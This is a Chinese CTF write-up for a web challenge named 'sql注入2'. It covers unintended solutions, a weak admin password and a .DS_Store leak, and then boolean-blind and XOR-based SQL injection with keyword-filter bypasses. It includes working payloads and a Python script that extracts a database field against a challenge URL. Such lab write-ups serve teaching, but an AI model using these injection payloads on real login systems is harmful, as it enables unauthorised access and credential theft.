sql注入2
题目不难,但是真的用了好长时间研究(主要原因是本地数据库和题目环境不太一样)这题真的是一言难尽。。不知道出题人nb还是sb。。。(我寻思这篇文章不能被他本人看到吧)
先来说一下非注入的解法
方法一
要拿到flag就得先用账户登录成功,flag并不在数据库里,我先尝试了用字典爆破admin密码,没想到竟然成功了???
后来发现竟然是弱口令!!!uname=admin passwd=admin123
(ps:果然,只要是人写出来代码就有可能存在安全漏洞,这种非预期解出题人直接原地去世。。。后面还有更离谱的解法。。
方法二
这个方法是看其他人题解,更离谱。。
网上大部分都是用.DS_Store泄露
.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,如文件的图标位置或背景色,相当于Windows的desktop.ini
御剑扫一下目录得到这个文件,下载后在这个文件中可以看到这个文件夹下的文件目录,里面有个flag,直接访问url…/flag下载得到flag
离谱的是御剑直接也扫出来了flag文件。。。直接下载flag。。很无语。。这和sql注入有什么关系。。
方法三
写这个方法之前先吹一下信安带佬一叶飘零,这个方法是借鉴了另一篇博客,没想到他竟然是参考一叶飘零的题解,没想到学长这么牛批。。看过他的博客后直呼方方土,行!!!
言归正传
方法一
先对sql关键字进行fuzz,真的过滤了很多关键字
返回长度370均为过滤的字符,其中包括注释符等
减号没有过滤,可以用减号闭合(第一次知道)
可以利用这个-1和0判断查询是否成功
username=0可以查询到所有包含非数字的字符串、以及字符串“0”
username=-1为空
因此可以利用布尔注入爆破passwd字段
payload=" admin’-(ascii(mid((reverse(mid((passwd)from(第?位))))from(-1)))=‘ascii码’)-’ "
mid函数原型mid(string,start,length)
逗号被过滤mid(string from(start) for (length))
for也被过滤,用reverse()+from(-1)
爆破每一位passwd字段
当payload为假时,返回”username error!!“
为真时,返回”password error!!“
本地实现过程中遇到了坑,当条件为真时应该返回空,username=-1,可是我本地却返回了除了满足条件的那一行的其他行,而这道题的实验环境却返回的是空,可能是数据库版本问题??
脚本中会给出查询版本号payload
方法二
除此之外还可以用异或注入
先爆破passwd长度
payload=“ua’^(length(passwd)=” + str(长度) + “)^'ub”
直接给出脚本
import requests
url='http://123.206.87.240:8007/web2/login.php'
pd_len=1
passwd="123"
while(1):
#uname="ua'^(length(passwd)=" + str(pd_len) + ")^'ub"
uname="ua'^(length(version())=" + str(pd_len) + ")^'ub"
#print(uname)
payload_1={'uname':uname,'passwd':passwd}
r=requests.post(url,data=payload_1)
if 'username error!!'in r.text :
break
pd_len+=1
print("length:"+str(pd_len))
password=''
for i in range(1,pd_len+1):
print('[*] No.%d' % i)
for j in "0123456789abcdefghijklmnopqrstuvwxyz*&^%$#@!.-":
#uname="admin'^(ascii(mid((reverse(mid((passwd)from(%d))))from(-1)))=%d)^'" %(i,ord(j))
uname="admin'^(ascii(mid((reverse(mid((version())from(%d))))from(-1)))=%d)^'" %(i,ord(j))
payload_2={'uname':uname,'passwd':passwd}
r=requests.post(url,data=payload_2)
if 'username error!!' in r.text :
password+=j
print('success')
break
print(password)
版本号:
解密md5即可得到admin123
登陆后输入ls得到flag